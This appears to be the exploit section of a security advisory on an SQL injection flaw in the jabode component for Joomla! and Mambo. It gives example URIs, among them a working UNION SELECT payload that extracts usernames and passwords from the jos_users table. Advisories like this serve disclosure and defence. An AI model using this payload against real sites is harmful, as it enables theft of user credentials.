Joomla! and Mambo jabode 'id' Parameter SQL Injection Vulnerability

info
discussion
exploit
solution
references

Joomla! and Mambo jabode 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id={SQL}
http://www.example.com/[Joomla_Path]/index.php?option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM jos_users--